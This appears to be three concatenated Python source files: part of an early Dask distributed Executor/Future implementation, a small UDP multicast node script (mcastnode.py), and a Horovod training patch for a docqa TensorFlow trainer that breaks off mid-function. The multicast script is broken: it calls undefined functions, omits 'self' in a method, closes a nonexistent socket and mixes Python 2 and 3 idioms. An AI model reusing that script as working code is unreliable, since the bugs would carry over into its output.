return self.event.is_set()
def result(self):
""" Wait until computation completes. Gather result to local process """
result = sync(self.executor.loop, self._result, raiseit=False)
if self.status in ('error', 'cancelled'):
raise result
else:
return result
@gen.coroutine
def _result(self, raiseit=True):
try:
d = self.executor.futures[self.key]
except KeyError:
exception = CancelledError(self.key)
if raiseit:
raise exception
else:
raise gen.Return(exception)
yield d['event'].wait()
if self.status == 'error':
exception = d['exception']
traceback = d['traceback'] # TODO: use me
if raiseit:
raise exception
else:
raise Return(exception)
else:
result = yield self.executor._gather([self])
raise gen.Return(result[0])
@gen.coroutine
def _exception(self):
yield self.event.wait()
if self.status == 'error':
exception = self.executor.futures[self.key]['exception']
raise Return(exception)
else:
raise Return(None)
def exception(self):
""" Return the exception of a failed task
See Also
--------
Future.traceback
"""
return sync(self.executor.loop, self._exception)
def cancelled(self):
""" Returns True if the future has been cancelled """
return self.key not in self.executor.futures
@gen.coroutine
def _traceback(self):
yield self.event.wait()
if self.status == 'error':
raise Return(self.executor.futures[self.key]['traceback'])
else:
raise Return(None)
def traceback(self):
""" Return the exception of a failed task
See Also
--------
Future.exception
"""
return sync(self.executor.loop, self._traceback)
def __del__(self):
self.executor._dec_ref(self.key)
def __str__(self):
return '<Future: status: %s, key: %s>' % (self.status, self.key)
__repr__ = __str__
@partial(normalize_token.register, Future)
def normalize_future(f):
return [f.key, type(f)]
class Executor(object):
""" Drive computations on a distributed cluster
The Executor connects users to a distributed compute cluster. It provides
an asynchronous user interface around functions and futures. This class
resembles executors in ``concurrent.futures`` but also allows ``Future``
objects within ``submit/map`` calls.
Parameters
----------
address: string, tuple, or ``Scheduler``
This can be the address of a ``Center`` or ``Scheduler`` servers, either
as a string ``'127.0.0.1:8787'`` or tuple ``('127.0.0.1', 8787)``
or it can be a local ``Scheduler`` object.
Examples
--------
Provide cluster's head node address on initialization:
>>> executor = Executor('127.0.0.1:8787') # doctest: +SKIP
Use ``submit`` method to send individual computations to the cluster
>>> a = executor.submit(add, 1, 2) # doctest: +SKIP
>>> b = executor.submit(add, 10, 20) # doctest: +SKIP
Continue using submit or map on results to build up larger computations
>>> c = executor.submit(add, a, b) # doctest: +SKIP
Gather results with the ``gather`` method.
>>> executor.gather([c]) # doctest: +SKIP
33
See Also
--------
distributed.scheduler.Scheduler: Internal scheduler
"""
def __init__(self, address, start=True, loop=None):
self.futures = dict()
self.refcount = defaultdict(lambda: 0)
self.loop = loop or IOLoop()
self.coroutines = []
self._start_arg = address
if start:
self.start()
def start(self, **kwargs):
""" Start scheduler running in separate thread """
if hasattr(self, '_loop_thread'):
return
from threading import Thread
self._loop_thread = Thread(target=self.loop.start)
self._loop_thread.daemon = True
pc = PeriodicCallback(lambda: None, 1000, io_loop=self.loop)
self.loop.add_callback(pc.start)
_global_executor[0] = self
self._loop_thread.start()
while not self.loop._running:
sleep(0.001)
sync(self.loop, self._start, **kwargs)
def _send_to_scheduler(self, msg):
if isinstance(self.scheduler, Scheduler):
self.loop.add_callback(self.scheduler_queue.put_nowait, msg)
elif isinstance(self.scheduler_stream, IOStream):
write(self.scheduler_stream, msg)
else:
raise NotImplementedError()
@gen.coroutine
def _start(self, **kwargs):
if isinstance(self._start_arg, Scheduler):
self.scheduler = self._start_arg
self.center = self._start_arg.center
if isinstance(self._start_arg, str):
ip, port = tuple(self._start_arg.split(':'))
self._start_arg = (ip, int(port))
if isinstance(self._start_arg, tuple):
r = coerce_to_rpc(self._start_arg)
ident = yield r.identity()
if ident['type'] == 'Center':
self.center = r
self.scheduler = Scheduler(self.center, loop=self.loop,
**kwargs)
self.scheduler.listen(0)
elif ident['type'] == 'Scheduler':
self.scheduler = r
self.scheduler_stream = yield connect(*self._start_arg)
yield write(self.scheduler_stream, {'op': 'start-control'})
if 'center' in ident:
cip, cport = ident['center']
self.center = rpc(ip=cip, port=cport)
else:
self.center = self.scheduler
else:
raise ValueError("Unknown Type")
if isinstance(self.scheduler, Scheduler):
if self.scheduler.status != 'running':
yield self.scheduler.sync_center()
self.scheduler.start()
self.scheduler_queue = Queue()
self.report_queue = Queue()
self.coroutines.append(self.scheduler.handle_queues(
self.scheduler_queue, self.report_queue))
start_event = Event()
self.coroutines.append(self._handle_report(start_event))
_global_executor[0] = self
yield start_event.wait()
logger.debug("Started scheduling coroutines. Synchronized")
def __enter__(self):
if not self.loop._running:
self.start()
return self
def __exit__(self, type, value, traceback):
self.shutdown()
def _inc_ref(self, key):
self.refcount[key] += 1
def _dec_ref(self, key):
self.refcount[key] -= 1
if self.refcount[key] == 0:
del self.refcount[key]
self._release_key(key)
def _release_key(self, key):
""" Release key from distributed memory """
logger.debug("Release key %s", key)
if key in self.futures:
self.futures[key]['event'].clear()
del self.futures[key]
self._send_to_scheduler({'op': 'release-held-data', 'keys': [key]})
@gen.coroutine
def _handle_report(self, start_event):
""" Listen to scheduler """
if isinstance(self.scheduler, Scheduler):
next_message = self.report_queue.get
elif isinstance(self.scheduler_stream, IOStream):
next_message = lambda: read(self.scheduler_stream)
else:
raise NotImplemented()
while True:
try:
msg = yield next_message()
except StreamClosedError:
break
if msg['op'] == 'stream-start':
start_event.set()
if msg['op'] == 'close':
break
if msg['op'] == 'key-in-memory':
if msg['key'] in self.futures:
self.futures[msg['key']]['status'] = 'finished'
self.futures[msg['key']]['event'].set()
if msg['op'] == 'lost-data':
if msg['key'] in self.futures:
self.futures[msg['key']]['status'] = 'lost'
self.futures[msg['key']]['event'].clear()
if msg['op'] == 'task-erred':
if msg['key'] in self.futures:
self.futures[msg['key']]['status'] = 'error'
self.futures[msg['key']]['exception'] = msg['exception']
self.futures[msg['key']]['traceback'] = msg['traceback']
self.futures[msg['key']]['event'].set()
if msg['op'] == 'restart':
logger.info("Receive restart signal from scheduler")
events = [d['event'] for d in self.futures.values()]
self.futures.clear()
for e in events:
e.set()
with ignoring(AttributeError):
self._restart_event.set()
@gen.coroutine
def _shutdown(self, fast=False):
""" Send shutdown signal and wait until scheduler completes """
self._send_to_scheduler({'op': 'close'})
if _global_executor[0] is self:
_global_executor[0] = None
if not fast:
yield self.coroutines
def shutdown(self, timeout=10):
""" Send shutdown signal and wait until scheduler terminates """
self._send_to_scheduler({'op': 'close'})
self.loop.stop()
self._loop_thread.join(timeout=timeout)
if _global_executor[0] is self:
_global_executor[0] = None
def submit(self, func, *args, **kwargs):
""" Submit a function application to the scheduler
Parameters
----------
func: callable
*args:
**kwargs:
pure: bool (defaults to True)
Whether or not the function is pure. Set ``pure=False`` for
impure functions like ``np.random.random``.
workers: set, iterable of sets
A set of worker hostnames on which computations may be performed.
Leave empty to default to all workers (common case)
Examples
--------
>>> c = executor.submit(add, a, b) # doctest: +SKIP
Returns
-------
Future
See Also
--------
Executor.map: Submit on many arguments at once
"""
if not callable(func):
raise TypeError("First input to submit must be a callable function")
key = kwargs.pop('key', None)
pure = kwargs.pop('pure', True)
workers = kwargs.pop('workers', None)
allow_other_workers = kwargs.pop('allow_other_workers', False)
if allow_other_workers not in (True, False, None):
raise TypeError("allow_other_workers= must be True or False")
if key is None:
if pure:
key = funcname(func) + '-' + tokenize(func, kwargs, *args)
else:
key = funcname(func) + '-' + str(uuid.uuid4())
if key in self.futures:
return Future(key, self)
if kwargs:
task = (apply, func, args, kwargs)
else:
task = (func,) + args
if allow_other_workers and workers is None:
raise ValueError("Only use allow_other_workers= if using workers=")
if isinstance(workers, str):
workers = [workers]
if workers is not None:
restrictions = {key: workers}
loose_restrictions = {key} if allow_other_workers else set()
else:
restrictions = {}
loose_restrictions = set()
task2, _ = unpack_remotedata(task)
logger.debug("Submit %s(...), %s", funcname(func), key)
self._send_to_scheduler({'op': 'update-graph',
'dsk': {key: task2},
'keys': [key],
'restrictions': restrictions,
'loose_restrictions': loose_restrictions})
return Future(key, self)
def map(self, func, *iterables, **kwargs):
""" Map a function on a sequence of arguments
Arguments can be normal objects or Futures
Parameters
----------
func: callable
iterables: Iterables
pure: bool (defaults to True)
Whether or not the function is pure. Set ``pure=False`` for
impure functions like ``np.random.random``.
workers: set, iterable of sets
A set of worker hostnames on which computations may be performed.
Leave empty to default to all workers (common case)
Examples
--------
>>> L = executor.map(func, sequence) # doctest: +SKIP
Returns
-------
list of futures
See also
--------
Executor.submit: Submit a single function
"""
pure = kwargs.pop('pure', True)
workers = kwargs.pop('workers', None)
allow_other_workers = kwargs.pop('allow_other_workers', False)
if allow_other_workers and workers is None:
raise ValueError("Only use allow_other_workers= if using workers=")
if not callable(func):
raise TypeError("First input to map must be a callable function")
iterables = [list(it) for it in iterables]
if pure:
keys = [funcname(func) + '-' + tokenize(func, kwargs, *args)
for args in zip(*iterables)]
else:
uid = str(uuid.uuid4())
keys = [funcname(func) + '-' + uid + '-' + str(uuid.uuid4())
for i in range(min(map(len, iterables)))]
if not kwargs:
dsk = {key: (func,) + args
for key, args in zip(keys, zip(*iterables))}
else:
dsk = {key: (apply, func, args, kwargs)
for key, args in zip(keys, zip(*iterables))}
dsk = {key: unpack_remotedata(task)[0] for key, task in dsk.items()}
if isinstance(workers, str):
workers = [workers]
if isinstance(workers, (list, set)):
if workers and isinstance(first(workers), (list, set)):
if len(workers) != len(keys):
raise ValueError("You only provided %d worker restrictions"
" for a sequence of length %d" % (len(workers), len(keys)))
restrictions = dict(zip(keys, workers))
else:
restrictions = {key: workers for key in keys}
elif workers is None:
restrictions = {}
else:
raise TypeError("Workers must be a list or set of workers or None")
if allow_other_workers not in (True, False, None):
raise TypeError("allow_other_workers= must be True or False")
if allow_other_workers is True:
loose_restrictions = set(keys)
else:
loose_restrictions = set()
logger.debug("map(%s, ...)", funcname(func))
self._send_to_scheduler({'op': 'update-graph',
'dsk': dsk,
'keys': keys,
'restrictions': restrictions,
'loose_restrictions': loose_restrictions})
return [Future(key, self) for key in keys]
@gen.coroutine
def _gather(self, futures):
futures2, keys = unpack_remotedata(futures)
keys = list(keys)
while True:
logger.debug("Waiting on futures to clear before gather")
yield All([self.futures[key]['event'].wait() for key in keys
if key in self.futures])
exceptions = [self.futures[key]['exception'] for key in keys
if self.futures[key]['status'] == 'error']
if exceptions:
raise exceptions[0]
response, data = yield self.scheduler.gather(keys=keys)
if response == b'error':
logger.debug("Couldn't gather keys %s", data)
self._send_to_scheduler({'op': 'missing-data',
'missing': data.args})
for key in data.args:
self.futures[key]['event'].clear()
else:
break
result = pack_data(futures2, data)
raise gen.Return(result)
def gather(self, futures):
""" Gather futures from distributed memory
Accepts a future or any nested core container of futures
Examples
--------
>>> from operator import add # doctest: +SKIP
>>> e = Executor('127.0.0.1:8787') # doctest: +SKIP
>>> x = e.submit(add, 1, 2) # doctest: +SKIP
>>> e.gather(x) # doctest: +SKIP
3
>>> e.gather([x, [x], x]) # support lists and dicts # doctest: +SKIP
[3, [3], 3]
See Also
--------
Executor.scatter: Send data out to cluster
"""
return sync(self.loop, self._gather, futures)
@gen.coroutine
def _scatter(self, data, workers=None):
remotes = yield self.scheduler.scatter(data=data, workers=workers)
if isinstance(remotes, list):
remotes = [Future(r.key, self) for r in remotes]
keys = {r.key for r in remotes}
elif isinstance(remotes, dict):
remotes = {k: Future(v.key, self) for k, v in remotes.items()}
keys = set(remotes)
for key in keys:
self.futures[key]['status'] = 'finished'
self.futures[key]['event'].set()
raise gen.Return(remotes)
def scatter(self, data, workers=None):
""" Scatter data into distributed memory
Accepts a list of data elements or dict of key-value pairs
Optionally provide a set of workers to constrain the scatter. Specify
workers as hostname/port pairs, e.g. ``('127.0.0.1', 8787)``.
Examples
--------
>>> e = Executor('127.0.0.1:8787') # doctest: +SKIP
>>> e.scatter([1, 2, 3]) # doctest: +SKIP
[RemoteData<center=127.0.0.1:8787, key=d1d26ff2-8...>,
RemoteData<center=127.0.0.1:8787, key=d1d26ff2-8...>,
RemoteData<center=127.0.0.1:8787, key=d1d26ff2-8...>]
>>> e.scatter({'x': 1, 'y': 2, 'z': 3}) # doctest: +SKIP
{'x': RemoteData<center=127.0.0.1:8787, key=x>,
'y': RemoteData<center=127.0.0.1:8787, key=y>,
'z': RemoteData<center=127.0.0.1:8787, key=z>}
>>> e.scatter([1, 2, 3], workers=[('hostname', 8788)]) # doctest: +SKIP
See Also
--------
Executor.gather: Gather data back to local process
"""
return sync(self.loop, self._scatter, data, workers=workers)
@gen.coroutine
def _get(self, dsk, keys, restrictions=None, raise_on_error=True):
flatkeys = list(flatten([keys]))
futures = {key: Future(key, self) for key in flatkeys}
dsk2 = {k: unpack_remotedata(v)[0] for k, v in dsk.items()}
dsk3 = {k: v for k, v in dsk2.items() if (k == v) is not True}
self._send_to_scheduler({'op': 'update-graph',
'dsk': dsk3,
'keys': flatkeys,
'restrictions': restrictions or {}})
packed = pack_data(keys, futures)
if raise_on_error:
result = yield self._gather(packed)
else:
try:
result = yield self._gather(packed)
result = 'OK', result
except Exception as e:
result = 'error', e
raise gen.Return(result)
def get(self, dsk, keys, **kwargs):
""" Compute dask graph
Parameters
----------
dsk: dict
keys: object, or nested lists of objects
restrictions: dict (optional)
A mapping of {key: {set of worker hostnames}} that restricts where
jobs can take place
Examples
--------
>>> from operator import add # doctest: +SKIP
>>> e = Executor('127.0.0.1:8787') # doctest: +SKIP
>>> e.get({'x': (add, 1, 2)}, 'x') # doctest: +SKIP
3
See Also
--------
Executor.compute: Compute asynchronous collections
"""
status, result = sync(self.loop, self._get, dsk, keys,
raise_on_error=False, **kwargs)
if status == 'error':
raise result
else:
return result
def compute(self, *args, **kwargs):
""" Compute dask collections on cluster
Parameters
----------
args: iterable of dask objects
Collections like dask.array or dataframe or dask.value objects
sync: bool (optional)
Returns Futures if False (default) or concrete values if True
Returns
-------
List of Futures
Examples
--------
>>> from dask import do, value
>>> from operator import add
>>> x = dask.do(add)(1, 2)
>>> y = dask.do(add)(x, x)
>>> xx, yy = executor.compute(x, y) # doctest: +SKIP
>>> xx # doctest: +SKIP
<Future: status: finished, key: add-8f6e709446674bad78ea8aeecfee188e>
>>> xx.result() # doctest: +SKIP
3
>>> yy.result() # doctest: +SKIP
6
See Also
--------
Executor.get: Normal synchronous dask.get function
"""
sync = kwargs.pop('sync', False)
assert not kwargs
if sync:
return dask.compute(*args, get=self.get)
variables = [a for a in args if isinstance(a, Base)]
groups = groupby(lambda x: x._optimize, variables)
dsk = merge([opt(merge([v.dask for v in val]),
[v._keys() for v in val])
for opt, val in groups.items()])
names = ['finalize-%s' % tokenize(v) for v in variables]
dsk2 = {name: (v._finalize, v._keys()) for name, v in zip(names, variables)}
dsk3 = {k: unpack_remotedata(v)[0] for k, v in merge(dsk, dsk2).items()}
self._send_to_scheduler({'op': 'update-graph',
'dsk': dsk3,
'keys': names})
i = 0
futures = []
for arg in args:
if isinstance(arg, Base):
futures.append(Future(names[i], self))
i += 1
else:
futures.append(arg)
return futures
@gen.coroutine
def _restart(self):
self._send_to_scheduler({'op': 'restart'})
self._restart_event = Event()
yield self._restart_event.wait()
raise gen.Return(self)
def restart(self):
""" Restart the distributed network
This kills all active work, deletes all data on the network, and
restarts the worker processes.
"""
return sync(self.loop, self._restart)
@gen.coroutine
def _upload_file(self, filename, raise_on_error=True):
with open(filename, 'rb') as f:
data = f.read()
_, fn = os.path.split(filename)
d = yield self.center.broadcast(msg={'op': 'upload_file',
'filename': fn,
'data': data})
if any(isinstance(v, Exception) for v in d.values()):
exception = next(v for v in d.values() if isinstance(v, Exception))
if raise_on_error:
raise exception
else:
raise gen.Return(exception)
assert all(len(data) == v for v in d.values())
def upload_file(self, filename):
""" Upload local package to workers
This sends a local file up to all worker nodes. This file is placed
into a temporary directory on Python's system path so any .py or .egg
files will be importable.
Parameters
----------
filename: string
Filename of .py or .egg file to send to workers
Examples
--------
>>> executor.upload_file('mylibrary.egg') # doctest: +SKIP
>>> from mylibrary import myfunc # doctest: +SKIP
>>> L = e.map(myfunc, seq) # doctest: +SKIP
"""
result = sync(self.loop, self._upload_file, filename,
raise_on_error=False)
if isinstance(result, Exception):
raise result
@gen.coroutine
def _wait(fs, timeout=None, return_when='ALL_COMPLETED'):
if timeout is not None:
raise NotImplementedError("Timeouts not yet supported")
if return_when == 'ALL_COMPLETED':
yield All({f.event.wait() for f in fs})
done, not_done = set(fs), set()
else:
raise NotImplementedError("Only return_when='ALL_COMPLETED' supported")
raise gen.Return(DoneAndNotDoneFutures(done, not_done))
ALL_COMPLETED = 'ALL_COMPLETED'
def wait(fs, timeout=None, return_when='ALL_COMPLETED'):
""" Wait until all futures are complete
Parameters
----------
fs: list of futures
Returns
-------
Named tuple of completed, not completed
"""
executor = default_executor()
result = sync(executor.loop, _wait, fs, timeout, return_when)
return result
@gen.coroutine
def _as_completed(fs, queue):
groups = groupby(lambda f: f.key, fs)
firsts = [v[0] for v in groups.values()]
wait_iterator = gen.WaitIterator(*[f.event.wait() for f in firsts])
while not wait_iterator.done():
result = yield wait_iterator.next()
# TODO: handle case of restarted futures
future = firsts[wait_iterator.current_index]
for f in groups[future.key]:
queue.put_nowait(f)
def as_completed(fs):
""" Return futures in the order in which they complete
This returns an iterator that yields the input future objects in the order
in which they complete. Calling ``next`` on the iterator will block until
the next future completes, irrespective of order.
This function does not return futures in the order in which they are input.
"""
if len(set(f.executor for f in fs)) == 1:
loop = first(fs).executor.loop
else:
# TODO: Groupby executor, spawn many _as_completed coroutines
raise NotImplementedError(
"as_completed on many event loops not yet supported")
from .compatibility import Queue
queue = Queue()
coroutine = lambda: _as_completed(fs, queue)
loop.add_callback(coroutine)
for i in range(len(fs)):
yield queue.get()
def default_executor(e=None):
""" Return an executor if exactly one has started """
if e:
return e
if _global_executor[0]:
return _global_executor[0]
else:
raise ValueError("No executors found\n"
"Start an executor and point it to the center address\n"
" from distributed import Executor\n"
" executor = Executor('ip-addr-of-center:8787')\n")
|
mcastnode.py | #!/usr/bin/python
# -------------------------------------------------------------------------
# Goals :
# ------
# Multicast node
# *************************************************************************
# ======================
# Import section
# ======================
import sys
import signal
import string
import random
from threading import *
from socket import *
from optparse import OptionParser
def setTimeout(func, time):
t = Timer(time, func)
t.start()
return t
class TimedOutObj:
def __init__(self, obj, collection, time):
self.obj = obj
self.collection = collection
self.time = time
def register(self):
self.collection.append(self)
self.resetTimeout()
def unregister(self):
self.unsetTimeout()
self.collection.remove(self)
def unsetTimeout(self):
if self.timeout:
self.timeout.cancel()
self.timeout = None
def resetTimeout(self):
self.unsetTimeout()
self.timeout = setTimeout(self.unregister, self.time)
# ====================================================
# Constantes
# ====================================================
MCAST_PORT = 10000
DATA_PORT = 10001
MCAST_MSG_LEN = 1024
ROOT_REFRESH = 120 # seconds
NODE_REFRESH = 120 # seconds
CHILDREN_MAX = 3
CHILDREN_TIMEOUT = 180 # seconds
SOCKET_TIMEOUT = 3.0
# Message types
ROOT = "ROOT"
TOOR = "TOOR"
RREG = "RREG"
YREG = "YREG"
NREG = "NREG"
RJOI = "RJOI"
YJOI = "YJOI"
NJOI = "NJOI"
class MC_Node(Thread):
# ====================================================
# Constructor
# ====================================================
def __init__(self, rp_addr):
Thread.__init__(self)
self.mcast_sock = socket(AF_INET, SOCK_DGRAM)
self.mcast_sock.bind(('', MCAST_PORT))
self.rp_addr = rp_addr
# Resolve adresses
self.addr = self.mcast_sock.getsockname()
self.data_addr = (self.addr[0], DATA_PORT)
self.childrens = []
def mcast_send(self, dest, type, data):
msg = type[:4]+"\r\n"+data
print('to: ', dest)
print('type:', type, ' data: ', data)
self.mcast_sock.sendto(msg.encode('UTF-8'), dest)
def mcast_recv(self):
data, addr = self.mcast_sock.recvfrom(MCAST_MSG_LEN)
print('from: ', addr)
print('type: ', data[:4], ' data: ', data[6:])
return data
# Root stuff
def getRoot(self):
self.mcast_send(self.rp_addr, ROOT, '')
data = self.mcast_recv()
if data[:4] == TOOR:
root = tuple(string.split(string.lstrip(data[4:])))
if len(root) == 2:
root = (root[0], int(root[1]))
return root
# TODO throw an error
return ()
def registerRoot(self):
self.mcast_send(self.rp_addr, RREG, '')
data = self.mcast_recv()
if data[:4] == YREG:
return True
elif data[:4] == NREG:
return False
# TODO throw an error
return
def updateRoot(self):
if self.registerRoot():
self.runRoot()
return
def runRoot(self):
self.root_timeout = setTimeout(self.updateRoot, ROOT_REFRESH)
# Node stuff
def registerNode(self, node_addr):
self.mcast_send(node_addr, RJOI, '')
data = self.mcast_recv()
if data[:4] == YJOI:
# Success -> set parent
self.parent = node_addr
self.runNode()
elif data[:4] == NJOI:
# Failure -> register on random children
child_addr = tuple(data[4:].split('\r\n')[
random.randint(0, 2)].split())
nodeRegister(child_addr)
def updateNode(self):
self.mcast_send(self.parent, RJOI, '')
self.mcast_sock.settimeout(SOCKET_TIMEOUT)
for i in range(0, 3):
try:
data = self.mcast_recv()
if data[:4] == YJOI:
self.mcast_sock.settimeout(None)
self.runNode()
return
except:
pass
self.mcast_sock.settimeout(None)
self.nodeRegister(self.getRoot())
def runNode(self):
self.node_timeout = setTimeout(self.updateNode, NODE_REFRESH)
# Child stuff
def registerChild(child_addr):
if len(self.childrens) < CHILDREN_MAX:
self.childrens.append(child_addr)
child = TimedOutObj(child_addr, self.childrens, CHILDREN_TIMEOUT)
child.register
self.mcast_send(child_addr, YJOI, '')
else:
self.mcast_send(child_addr, NJOI, "\r\n".join(
" ".join(x) for x in childrens))
def dataLoop(self):
sock = socket(AF_INET, SOCK_DGRAM)
sock.bind(('', DATA_PORT))
while True:
try:
data, addr = sock.recvfrom(1024)
print("DATA: ", data)
for child in self.childrens:
sock.sendto(data, (child.obj[0], DATA_PORT))
except KeyboardInterrupt:
print
# close
self.data_sock.close()
def run(self):
root = self.getRoot()
if root == ():
if self.registerRoot():
# This node is the root one
# Must keep alive
self.runRoot()
else:
root = self.getRoot()
if root != ():
self.registerNode(root)
Thread(target=self.dataLoop).start()
while True:
try:
data, addr = self.mcast_sock.recvfrom(1024)
type = data[:4]
if type == RJOI:
child = next(
(x for x in self.childrens if x.obj == addr), None)
if child is None:
childRegister(addr)
else:
child.resetTimeout()
self.mcast_send(child.obj, YJOI, '')
except KeyboardInterrupt:
print
# close
self.mcast_sock.close()
parser = OptionParser(usage='usage: %prog [options]')
parser.set_defaults(server="127.0.0.1")
parser.add_option("-s", action='store', type='string',
dest="server", help='Server IP address')
(options, args) = parser.parse_args()
server = MC_Node((options.server, MCAST_PORT))
server.start()
|
horovod_patches.py | # Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from docqa import trainer
import horovod.tensorflow as hvd
import time
from os.path import join, relpath
from typing import List, Union
import numpy as np
import tensorflow as tf
from docqa.dataset import TrainingData
from docqa.evaluator import Evaluator, AysncEvaluatorRunner
from docqa.model import Model
from docqa.model_dir import ModelDir
from threading import Thread
def _build_train_ops(train_params):
""" Bulid ops we should run during training, including learning, EMA, and summary ops"""
global_step = tf.get_variable('global_step', shape=[], dtype='int32',
initializer=tf.constant_initializer(0), trainable=False)
#global_step = tf.train.get_or_create_global_step()
loss = tf.get_collection(tf.GraphKeys.LOSSES)
if len(loss) == 0:
raise RuntimeError("No losses found in losses collection")
loss = tf.add_n(loss, name="loss")
if len(tf.get_collection(tf.GraphKeys.SUMMARIES)) > 0:
# Add any summaries client stored in SUMMARIES
summary_tensor = tf.summary.merge([[tf.summary.tensor_summary("loss", loss)] +
tf.get_collection(tf.GraphKeys.SUMMARIES)])
else:
summary_tensor = tf.summary.tensor_summary("loss", loss)
train_objective = loss
regularizers = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
if len(regularizers) > 0:
regularization_loss = tf.add_n(regularizers, name="regularization_loss")
if train_params.regularization_weight is not None:
train_objective = train_objective + regularization_loss * train_params.regularization_weight
else:
train_objective = train_objective + regularization_loss
else:
regularization_loss = None
opt = train_params.opt.get()
opt = hvd.DistributedOptimizer(opt)
#train_opt = opt.apply_gradients(opt.compute_gradients(train_objective), global_step=global_step)
train_opt = opt.minimize(train_objective, global_step=global_step)
if train_params.ema is not None:
ema = tf.train.ExponentialMovingAverage(decay=train_params.ema)
ema_op = ema.apply(tf.trainable_variables())
with tf.control_dependencies([train_opt]):
# Run the old training op, then update the averages.
train_opt = tf.group(ema_op)
else:
ema = None
# Any collections starting with "monitor" are also added as summaries
to_monitor = {}
for col in tf.get_default_graph().get_all_collection_keys():
if col.startswith("monitor"):
v = tf.get_collection(col)
if len(v) > 0:
print("Monitoring: " + col)
v = tf.add_n(v)
to_monitor[col] = v
if len(to_monitor) > 0:
monitor_ema = tf.train.ExponentialMovingAverage(decay=train_params.monitor_ema, name="MonitorEMA",
zero_debias=True)
train_opt = tf.group(train_opt, monitor_ema.apply(list(to_monitor.values())))
summary_tensor = tf.summary.merge(
[tf.summary.scalar(col, monitor_ema.average(v)) for col, v in to_monitor.items()] +
[summary_tensor])
# EMA for the loss and what we monitoring
if train_params.loss_ema is not None:
loss_ema = tf.train.ExponentialMovingAverage(decay=train_params.loss_ema, name="LossEMA", zero_debias=True)
if regularization_loss is None:
ema_op = loss_ema.apply([loss])
train_opt = tf.group(train_opt, ema_op)
ema_var = loss_ema.average(loss)
summary_tensor = tf.summary.merge([tf.summary.scalar("training-ema/loss", ema_var), summary_tensor])
else:
to_track = [loss, train_objective, regularization_loss]
ema_op = loss_ema.apply(to_track)
train_opt = tf.group(train_opt, ema_op)
tensor_vars = [
tf.summary.scalar("training-ema/loss", loss_ema.average(loss)),
tf.summary.scalar("training-ema/objective", loss_ema.average(train_objective)),
tf.summary.scalar("training-ema/regularization-loss",
loss_ema.average(regularization_loss))
]
summary_tensor = tf.summary.merge([tensor_vars, summary_tensor])
return loss, summary_tensor, train_opt, global_step, ema
def _train(model: Model,
data: TrainingData,
checkpoint: Union[str, None],
parameter_checkpoint: Union[str, None],
save_start: bool,
train_params: trainer.TrainParams,
evaluators: List[Evaluator],
out: ModelDir,
notes=None,
dry_run=False,
start_eval=False):
print('Horovod size: ', hvd.size())
print('Horovod rank: ', hvd.rank())
print('Horovod local rank: ', hvd.local_rank())
if train_params.async_encoding:
_train_async(model, data, checkpoint, parameter_checkpoint, save_start, train_params,
evaluators, out, notes, dry_run, start_eval)
return
else:
raise NotImplementedError('Syncronous training with Horovod not supported yet')
def _train_async(model: Model,
data: TrainingData,
checkpoint: Union[str, None],
parameter_checkpoint: Union[str, None],
save_start: bool,
train_params: trainer.TrainParams,
evaluators: List[Evaluator],
out: ModelDir,
notes=None,
dry_run=False,
start_eval=False):
""" Train while encoding batches on a seperate thread and storing them in a tensorflow Queue, can
be much faster then using the feed_dict approach """
train = data.get_train()
eval_datasets = data.get_eval()
loader = data.get_resource_loader()
print("Training on %d batches" % len(train))
print("Evaluation datasets: " + " ".join("%s (%d)" % (name, len(data)) for name, data in eval_datasets.items()))
# spec the model for the given datasets
model.set_inputs([train] + list(eval_datasets.values()), loader)
placeholders = model.get_placeholders()
train_queue = tf.FIFOQueue(train_params.async_encoding, [x.dtype for x in placeholders], name="train_queue")
evaluator_runner = AysncEvaluatorRunner(evaluators, model, train_params.async_encoding)
train_enqeue = train_queue.enqueue(placeholders)
train_close = train_queue.close(True)
is_train = tf.placeholder(tf.bool, ())
input_tensors = tf.cond(is_train, lambda: train_queue.dequeue(),
lambda: evaluator_runner.eval_queue.dequeue())
# tensorfow can't infer the shape for an unsized queue, so set it manually
for input_tensor, pl in zip(input_tensors, placeholders):
input_tensor.set_shape(pl.shape)
bcast = hvd.broadcast_global_variables(0)
print("Init model...")
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
config.gpu_options.visible_device_list = str(hvd.local_rank())
sess = tf.Session(config=config)
with sess.as_default():
pred = model.get_predictions_for(dict(zip(placeholders, input_tensors)))
evaluator_runner.set_input(pred)
if parameter_checkpoint is not None:
print("Restoring parameters from %s" % parameter_checkpoint)
saver = tf.train.Saver()
saver.restore(sess, checkpoint)
saver = None
print("Setting up model prediction / tf...")
all_vars = tf.global_variables()
loss, summary_tensor, train_opt, global_step, weight_ema = _build_train_ops(train_params)
# Pre-compute tensors we need at evaluations time
eval_tensors = []
for ev in evaluators:
eval_tensors.append(ev.tensors_needed(pred))
if train_params.best_weights is not None:
lst = all_vars
if weight_ema is not None:
for x in lst:
v = weight_ema.average(x)
if v is not None:
lst.append(v)
best_weight_saver = tf.train.Saver(var_list=lst, max_to_keep=1)
cur_best = None
else:
best_weight_saver = None
cur_best = None
saver = tf.train.Saver(max_to_keep=train_params.max_checkpoints_to_keep)
summary_writer = tf.summary.FileWriter(out.log_dir)
# Load or initialize the model parameters
if checkpoint is not None:
print("Restoring from checkpoint...")
saver.restore(sess, checkpoint)
print("Loaded checkpoint: " + str(sess.run(global_step)))
else:
print("Initializing parameters...")
sess.run(tf.global_variables_initializer())
sess.run(bcast)
# Make sure no bugs occur that add to the graph in the train loop, that can cause (eventuall) OOMs
tf.get_default_graph().finalize()
if dry_run:
return
on_step = sess.run(global_step)
if save_start:
# summary_writer.add_graph(sess.graph, global_step=on_step)
if hvd.rank() == 0:
trainer.save_train_start(out.dir, data, sess.run(global_step), evaluators, train_params, notes)
def enqueue_train():
try:
# feed data from the dataset iterator -> encoder -> queue
for epoch in range(train_params.num_epochs):
for batch in train.get_epoch():
feed_dict = model.encode(batch, True)
sess.run(train_enqeue, feed_dict)
except tf.errors.CancelledError:
# The queue_close operator has been called, exit gracefully
return
except Exception as e:
# Crashes the main thread with a queue exception
sess.run(train_close)
raise e
train_enqueue_thread = Thread(target=enqueue_train)
